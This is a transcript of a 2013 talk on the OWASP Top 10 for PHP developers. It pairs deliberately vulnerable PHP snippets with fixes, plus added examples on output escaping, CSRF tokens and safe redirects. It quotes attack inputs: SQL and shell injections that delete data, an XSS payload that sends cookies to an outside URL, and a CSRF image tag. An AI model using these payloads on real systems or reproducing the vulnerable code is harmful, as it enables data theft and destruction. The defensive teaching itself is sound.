OWASP TOP 10 for PHP Programmers

Presented at #PHPLX 11 September 2013

The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.

OWASP TOP 10 for PHP Programmers

  1. OWASP TOP 10 for PHP programmers. RICARDO MELO. Presented at #PHPLX – 11 September 2013. Follow this topic: @rjsmelo, #owasp, #php, #appsec
  2. RICARDO MELO
     ● CTO @ DRI
     ● PHP, MySQL, Linux and lots of other OSS
     ● ZCE, RHCE, LPI 3, ITIL, etc.
     ● +10 years building (and breaking) things
  3. About
     ● 14 year old academic spin-off
     ● Pragmatic OSS orientation
     ● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
     ● Crafters, integrators
     ● Always looking for software developers – yes, right now!
  4. Outline
     ● OWASP
     ● OWASP TOP 10
     ● What's Next
     ● Conclusions
     (1999 - 2013 DRI. Some Rights Reserved.)
  5. What is OWASP?
     ● Open Web Application Security Project
     ● Worldwide not-for-profit
     ● Focus on security improvement and awareness
     ● Very active community
     ● Lots of projects (you can start yours)
  6. What is the OWASP TOP 10?
     ● The full name is “The Top 10 Most Critical Web Application Risks”
     ● The focus is awareness
     ● Released 2003, 2004, 2007, 2010 and 2013
     ● https://www.owasp.org/index.php/Top_10_2013
  7. Risk? The OWASP risk rating, one column per factor (the same value of a factor appears in one row):

     | Threat Agents        | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts                |
     |----------------------|----------------|---------------------|------------------------|-------------------|---------------------------------|
     | Application Specific | EASY           | WIDESPREAD          | EASY                   | SEVERE            | Application / Business Specific |
     |                      | AVERAGE        | COMMON              | AVERAGE                | MODERATE          |                                 |
     |                      | DIFFICULT      | UNCOMMON            | DIFFICULT              | MINOR             |                                 |
  8. OWASP TOP 10 - 2013
     ● A1 – Injection
     ● A2 – Broken Authentication and Session Management
     ● A3 – Cross-Site Scripting (XSS)
     ● A4 – Insecure Direct Object References
     ● A5 – Security Misconfiguration
     ● A6 – Sensitive Data Exposure
     ● A7 – Missing Function Level Access Control
     ● A8 – Cross-Site Request Forgery (CSRF)
     ● A9 – Using Components with Known Vulnerabilities
     ● A10 – Unvalidated Redirects and Forwards
  9. A1 - Injection
     ● Occurs when untrusted data is sent directly to an interpreter!
     ● Not only SQL: NoSQL, LDAP, OS commands, XML, XPath!
     ● Never, NEVER trust ANY input!
  10. A1 – Injection Examples - SQL

```php
<?php
// prone to SQL injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
// untrusted input concatenated straight into the statement
$stmt = $db->query(
    "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set start_record = "1; delete from some_table; -- "
```

```php
<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
// LIMIT needs an integer: bind it as PDO::PARAM_INT, otherwise PDO's
// emulated prepares would quote the value and MySQL would reject the query
$stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
$stmt->execute();
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
```
  11. A1 - Injection Examples - OS

```php
<?php
// script.php?file=xpto.pdf
// untrusted input concatenated into a shell command line
$fileType = exec("file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"
```

```php
<?php
// script.php?file=xpto.pdf
// escapeshellarg() wraps the value in single quotes, so it is one argument
$fileType = exec("file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
```
  12. A2 – Broken Authentication and Session Management
     ● Broken implementations allow an attacker to assume another user's identity!
     ● Can be session hijacking / fixation
     ● Broken authentication
     ● Or other failures that lead to compromised passwords / keys / session tokens
  13. A2 – Session Fixation

```php
<?php
// prone to session fixation: the session id chosen before login
// (possibly planted by the attacker) stays valid after login
// [ ... ]
$userDetails = check_credentials($username, $password);
if ($userDetails !== false) {
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
```

```php
<?php
// [ ... ]
$userDetails = check_credentials($username, $password);
if ($userDetails !== false) {
    // issue a fresh session id on privilege change and delete the old one
    session_regenerate_id(true);
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
```
  14. A3 – Cross-Site Scripting (XSS)
     ● Whenever untrusted data is sent to the browser without proper validation and escaping!
     ● XSS allows the attacker to OWN the victim's browser and do ... everything!
     ● Stored, Reflected and DOM based XSS
  15. A3 – steal user cookie

```php
<?php
// page prone to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<!-- the search term is echoed back unescaped -->
<p>results for : <?= $_REQUEST['search']; ?></p>
<?= render_results($results); ?>
</body>
</html>
```

Set search to: `<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>`

```php
<?php
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?></p>
<?= render_results($results); ?>
</body>
</html>
```
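The slide escapes for one context only (HTML text, with ENT_COMPAT, which leaves single quotes alone). As an added example, not from the slides, here is the same untrusted search term escaped for the three places a PHP template typically puts it; the helper names are my own:

```php
<?php
// Added example: one escaping function per output context.
// Assumes PHP >= 7.0 for the ?? operator; output is declared as UTF-8.

// Text between tags AND double-quoted attribute values.
// ENT_QUOTES also escapes the single quote, which ENT_COMPAT leaves untouched.
function e_html($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Value embedded inside a <script> block: json_encode() produces a JS literal,
// and the JSON_HEX_* flags turn < > & ' " into \uXXXX so that a value such as
// "</script><script>..." cannot close the surrounding script element.
function e_js($s)
{
    return json_encode((string) $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Value placed inside a query string of a URL.
function e_url($s)
{
    return rawurlencode((string) $s);
}

$search = $_REQUEST['search'] ?? '';
?>
<p>results for : <?= e_html($search) ?></p>
<!-- attribute values must always be quoted for e_html() to be sufficient -->
<input type="text" name="search" value="<?= e_html($search) ?>">
<a href="/script.php?search=<?= e_url($search) ?>">search again</a>
<script>
    var lastSearch = <?= e_js($search) ?>;
</script>
```

With the slide's payload, e_html() renders the script tag as visible text, e_js() yields a harmless string literal, and e_url() keeps it inside the query parameter.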
  16. A4 – Insecure Direct Object Reference
     ● Whenever a developer exposes references to internal objects without proper access control.
     ● Attackers can change the references and access resources that shouldn't be accessible.
  17. A4 – Access another user's account

```php
<?php
// prone to insecure direct object reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
// the id is validated as a number, but nobody checks who may read it
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?
```

```php
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
// authorize the logged-in user against the referenced object
if ($account->canRead($user)) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
```
  18. A5 – Security Misconfiguration
     ● Failing to secure the full stack often leads to the application / servers being compromised.
     ● Take into consideration other services / applications running in the same infrastructure
     ● Watch out for outdated software
     ● Watch out for default accounts
  19. A6 – Sensitive Data Exposure
     ● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
     ● Credit card fraud, identity theft, etc!
     ● Be aware: data should be protected both in transit and in the storage engine (don't forget the backups)
  20. A7 – Missing Function Level Access Control
     ● Most applications check function level access control before displaying options in the UI, but fail to check it again when the function is actually accessed.
     ● An attacker can forge requests to functions that shouldn't be available
  21. A7 – insecure function

```php
<?php
// prone to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
// every action is reachable by anyone who knows its name
switch ($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?
```

```php
<?php
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
// each action re-checks the permission at the point of use
switch ($action) {
    case 'read':
        if ($user->canRead($loggedUser)) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ($user->canDelete($loggedUser)) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
```
  22. A8 – Cross-Site Request Forgery (CSRF)
     ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session)
     ● The server sees no difference from user generated requests!
  23. A8 – delete user

```php
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
// the access check passes: the victim's own browser sends the cookie
if ($user->canDelete($loggedUser)) {
    $user->delete();
}
?>
```

Attacker's site:

```html
<img src="http://www.example.com/users/delete.php?id=123" />
```

```php
<?php
// fixed app: the request must carry a token the attacker's page cannot know
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (validate_token($_REQUEST['token'])) {
    if ($user->canDelete($loggedUser)) {
        $user->delete();
    }
}
```
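The slide leaves validate_token() undefined. As an added example that is not part of the talk, here is a per-session token: generated once, embedded in the delete form, and compared in constant time on the way back. It assumes PHP >= 7.0 (random_bytes(), the ?? operator) and that session_start() has already run; csrf_token() and render_delete_form() are my names.

```php
<?php
// Added example: CSRF token issue and check for the delete.php on the slide.

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 32 bytes from the CSPRNG, hex-encoded so it is safe inside HTML and URLs
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function validate_token($token): bool
{
    if (!is_string($token) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // hash_equals() compares in constant time, so no timing leak of the token
    return hash_equals($_SESSION['csrf_token'], $token);
}

// The delete form carries the token as a hidden field. Using POST rather than
// a GET link also defeats the <img src="..."> trick shown on the slide.
function render_delete_form(int $id): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/users/delete.php">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="token" value="' . $token . '">'
         . '<button type="submit">Delete</button></form>';
}

// delete.php: refuse anything that is not a POST with a valid token,
// before the object is even loaded
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !validate_token($_POST['token'] ?? null)) {
    http_response_code(403);
    exit('Invalid request');
}
$id = intval($_POST['id']);
// ... then the canDelete() check and delete() exactly as on the slide
```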
  24. A9 – Using Components with Known Vulnerabilities
     ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
     ● Attackers can leverage these issues to attack your application / server / etc.
  25. A10 – Unvalidated Redirects and Forwards
     ● Web applications often redirect users to other pages, using untrusted data to determine the destination page.
     ● Attackers can redirect victims to phishing or malware pages, or use forwards to access unauthorized pages.
  26. A10 – “simple” Forward

```php
<?php
class someController extends baseController
{
    public function preFunction($args, $action)
    {
        $this->checkAccess($args, $action);
    }

    public function indexAction($args)
    {
        // [...] do something here
        if ($args['callback'] && method_exists($this, $args['callback'])) {
            // forwards to ANY method of this controller, e.g. destroyAction,
            // without the access check the framework runs for a normal action
            $callback = $args['callback'];
            unset($args['callback']);
            call_user_func_array(array($this, $callback), $args);
        }
        return $response;
    }

    public function destroyAction($args)
    {
        $this->selfTerminate();
    }
}
```

```php
if ($args['callback'] && method_exists($this, $args['callback'])) {
    $callback = $args['callback'];
    // run the same access check for the forwarded action as for a direct request
    $this->preFunction($args, $callback);
    unset($args['callback']);
    call_user_func_array(array($this, $callback), $args);
}
```
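The slide covers the forward case; the redirect case from the previous slide (a `?next=` style parameter fed into a Location header) is shown here as an added example, not from the talk. It assumes PHP >= 7.0 for the ?? operator; safe_redirect_target() and the host list are mine.

```php
<?php
// Added example: only redirect to a local path or to an allow-listed host,
// otherwise fall back to a fixed page.

function safe_redirect_target($target, array $allowedHosts, $fallback = '/')
{
    if (!is_string($target) || $target === '') {
        return $fallback;
    }
    // Local path: must start with exactly one "/". "//evil.example" and
    // "/\evil.example" are scheme-relative URLs for browsers, so reject them.
    if ($target[0] === '/') {
        $second = substr($target, 1, 1);
        return ($second === '/' || $second === '\\') ? $fallback : $target;
    }
    $parts = parse_url($target);
    if ($parts === false || !isset($parts['host'])) {
        return $fallback;              // malformed, or no host to check
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return $fallback;              // javascript:, data:, etc.
    }
    // parse_url() gives the real host even for "http://www.example.com@evil.example"
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return $fallback;              // external host not on the allow-list
    }
    return $target;
}

// Constructed configuration: the hosts this application may send users to
$allowedHosts = ['www.example.com', 'example.com'];

$next = safe_redirect_target($_REQUEST['next'] ?? null, $allowedHosts, '/home');
header('Location: ' . $next, true, 302);
exit;
```

For inputs such as `http://evil.example/`, `//evil.example`, `javascript:alert(1)` or `http://www.example.com@evil.example/` the function returns the fallback; `/account` and `https://www.example.com/account` pass through unchanged.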
  27. What's Next For PHP Programmers
     ● OWASP – http://goo.gl/lVRRY
     ● Cheat Sheets – http://goo.gl/lVRRY
     ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H
     ● OWASP Books – free – http://goo.gl/aLx1q2
  28. Conclusions
     ● Keeping the application secure is a continuous process
     ● Avoiding the TOP 10 risks doesn't make your application secure, but it is already a HUGE step forward.
     ● Don't trust ANY input! Escape every output!
  29. Thank you
  30. Follow this topic: @rjsmelo, #owasp, #php, #appsec. QA Feedback: https://joind.in/9107
  31. www.dri-global.com – @rjsmelo – ricardo.melo@dri-global.com